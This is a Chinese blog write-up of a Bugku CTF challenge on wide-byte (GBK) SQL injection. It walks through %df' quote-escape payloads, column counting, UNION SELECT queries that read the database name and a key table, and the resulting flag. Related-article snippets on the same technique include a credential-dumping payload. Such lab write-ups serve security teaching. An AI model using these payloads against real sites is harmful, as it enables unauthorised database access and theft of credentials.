bugku ctf sql注入 (宽字节注入毫无压力)

最新推荐文章于 2024-05-11 22:44:48 发布
最新推荐文章于 2024-05-11 22:44:48 发布
阅读量795 收藏 1
点赞数 1
分类专栏: bugku ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42777804/article/details/81603586
版权

看一下这么一道题,分支比较低。

先进去看一下

 

 

让我们查询 id=1 的 string 字段 

 

那就、先给他加上  ?id=1

发现还是这个界面 呀

 

那如果换为  id=2   看一下结果

 

 

下面会 变成  空白的 ~~~~~~

那就只好用 ?id=1   这个了

 

正常注入   

/?id=1'
/?id=1'and 1=1%23
/?id=1'and 1=2%23

 

发现都没有反应  ,,

只好尝试  宽字节注入 

 

输入

/?id=1%df'

 

出现错误         那么  应该就是  宽字节注入了

 

验证一下

/?id=1%df' and 1=1%23      时   

正确

 

/?id=1%df' and 1=2%23     时

错误

 

 

确定就是宽字节注入

然后看一下有没有显示位

先查一下有几列

/?id=1%df' order by 2%23   正确

/?id=1%df' order by 3%23   错误       说明有2列

 

 

看显示位

/?id=1%df' order by 2%23

 

 

正好分别是   id   和   key

 

 

那再查一下 database     

/?id=1%df' and 1=2 union select 1,database()%23

 

 

发现数据库 名  为    sql5

 

这下就好办了   

题目要求 查询  key表   id=1   的string字段 内容

直接 构造 语句 

/?id=1%df' and 1=2 union select 1, string from sql5.key where id=1%23

 

发现 flag

54f3320dc261f313ba712eb3f13a1f6d

 

就是217
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF从入门到提升之字节注入
anquanniu的博客
08-15 1422
CTF入门到放弃 为什么说是从入门到放弃呢?(开个玩笑)如果说大家对CTF有了解的话,其实应该知道CTF是一个什么类型的比赛,这个比赛涉及的范围和影响有多大。如果说你真的想打好比赛,那也是真的非常不容易的,所以说这是非常困难的一件事情,初期可能学着学着就想放弃了,所以我就以这个来作为一个标题,当然本意不是让大家去放弃,就是为了让大家入个门然后再提升! 我会和我朋友一起来完成这门课程的讲解。 课程主...
ctfsql注入——字节注入
wlllllianqing的博客
09-13 651
字节注入 字节注入:主要针对GBK编码的注入 基础:了解url转码 例如: 空格 : %20 ’ : %27 # :%23 \ : %5C addslashes() 函数 了解addslashes()函数,发现它会返回在预定义的字符之前添加反斜杠的字符串。 当我们进行注入时使用单引号或双引号进行语句的闭合时,该函数会自动在字符前添加反斜杠将字符转义,导致该字符无法实现作用而导致注入失败。 如何绕过addslashes()函数从而达到注入的效果呢? 方法一
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1203
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
bugku 字节注入
uniq_sea的博客
04-14 401
习惯性先查看源代码。看到编码是gb2312的格式----》字节注入构造url,这里输入:103.238.227.13:10083/?id=1%bf' order by 2#  同样会报错,因为#不会被翻译,所以需要手工翻译===》判断出两个字段。然后爆数据库查询数据库...
CTF学习笔记8:iwebsec-SQL注入漏洞-06-字节注入
lifeng_dc的博客
01-23 949
直接上payload ?id=-1%df’ union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users–+
CTF/CTF练习平台 --SQL注入测试【sql字节注入与#,#】
Sp4rkW的博客
08-19 1万+
原题内容: http://103.238.227.13:10083/ 这题其实就是考验sql注入基本功,写个wp记录下自己的几个失误点,与大家共同学习 首先,打开页面可见 题目提示的很明显了,这是一个注入题,我们肯定得找到注入点,一般的思路都是'闭合导致注入,关键是找到什么数据被传入了数据库,才能确定注入点 按照常规思路,习惯性加上一个index.php,...
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
SQL注入漏洞演示源代码
07-15
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过在输入字段...
SQL注入原理及PHP防注入代码.pdf
03-31
SQL注入基本概念,原理,防注入php代码以及 相关的图片实例,具体可下载查看。
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
mysql注入ctf_CTF—WEB—sql注入字节注入
weixin_34565946的博客
02-02 207
字节注入字节注入是利用mysql的一个特性,mysql在使用GBK编码(GBK就是常说的字节之一,实际上只有两字节)的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围),而当我们输入有单引号时会自动加入\进行转义而变为\’(在PHP配置文件中magic_quotes_gpc=On的情况下或者使用addslashes函数,icov函数,mysql_real_esc...
字节注入
热门推荐
heiseweiye的博客
09-16 1万+
GBK注射 字节注入 ** 在使用PHP连接MySQL的时候,当设置“set character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的字节注入,当存在字节注入的时候,注入参数里带入% DF%27,即可把(%5C)吃掉,举个例子。 ** http://chinalover.sinaapp.com/SQL-GBK/in...
mysql注入ctf_【CTF-Web Learning 1】0x01 SQL注入字节注入
weixin_39776817的博客
01-28 146
0x01 前言准备系统梳理和总结提高这一年所学的关于Web方面东西,如有问题欢迎指点。在计算机中,字符的表示与存储都离不开编码。例如ASCII,utf-8,gbk2312等。通常字符的表示都只需1字节。但也有如gbk2312这种需要2字节来表示的编码格式,这种我们称之为字节。所谓字节注入,可能存在于以gbk编码存储数据的sql数据库中。在实际站点中已经比较少见(常见于学校远古破站),而且修复方...
ctf php sql注入,【CTF-Web Learning 1】0x01 SQL注入字节注入
weixin_36335651的博客
03-17 324
0x01 前言准备系统梳理和总结提高这一年所学的关于Web方面东西,如有问题欢迎指点。在计算机中,字符的表示与存储都离不开编码。例如ASCII,utf-8,gbk2312等。通常字符的表示都只需1字节。但也有如gbk2312这种需要2字节来表示的编码格式,这种我们称之为字节。所谓字节注入,可能存在于以gbk编码存储数据的sql数据库中。在实际站点中已经比较少见(常见于学校远古破站),而且修复方...
(学习)SQL注入--字节注入
Huang921的博客
11-21 3861
SQL注入字节注入实践
MySQL字节注入漏洞分析_CTF/CTF练习平台 --SQL注入测试【sql字节注入与#,#】...
weixin_35666711的博客
02-08 113
原题内容:http://103.238.227.13:10083/这题其实就是考验sql注入基本功,写个wp记录下自己的几个失误点,与大家共同学习首先,打开页面可见题目提示的很明显了,这是一个注入题,我们肯定得找到注入点,一般的思路都是'闭合导致注入,关键是找到什么数据被传入了数据库,才能确定注入点按照常规思路,习惯性加上一个index.php,没问题,可以,再试试get进去个变量?id=1(至于...
字节注入学习笔记
weixin_50597969的博客
01-13 199
字节注入学习笔记前言一、什么是字节注入?二、练习题目链接: 前言 这周学习sql注入,做笔记记录一下 一、什么是字节注入? 二、练习 题目链接: http://chinalover.sinaapp.com/SQL-GBK/ sqli-labs 第32关(没有搭建的话可以去buuctf找basic中的sqli-labs)[这个可以配合理解,自行操作效果极佳] 随便输个id 尝试用单引号闭合 发现‘ ‘ ’(单引号)转变成了‘ \’ ’(反斜杠+单引号) 那就结合今天所学知识进行操作
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是一道较为简单的SQL注入题目,提供了一个特定的注入点,要求参与者利用SQL注入漏洞获取特定的信息或完成特定的任务。 2. CTFSHOW-sql注入(一) 这是CTFSHOW平台上的一个系列题目,主要介绍了SQL注入的基础知识点和常见题型。参与者可以通过完成不同的题目来逐步提升自己的SQL注入技能。 3. web 171(万能密码) 这是一个具有万能密码漏洞的网页应用题目。参与者需要在登录页面的密码字段中输入特定的注入payload,以绕过身份验证,获取敏感信息或进行其他未授权的操作。 4. web 172(过滤回显内容) 这是一个具有回显内容过滤漏洞的网页应用题目。参与者需要在输入框中构造特定的注入payload,以绕过过滤机制并成功回显注入结果。 这些题目的目的是帮助参与者了解、掌握和应用SQL注入漏洞的原理和技巧,提高其对于Web应用安全的认识和实践能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值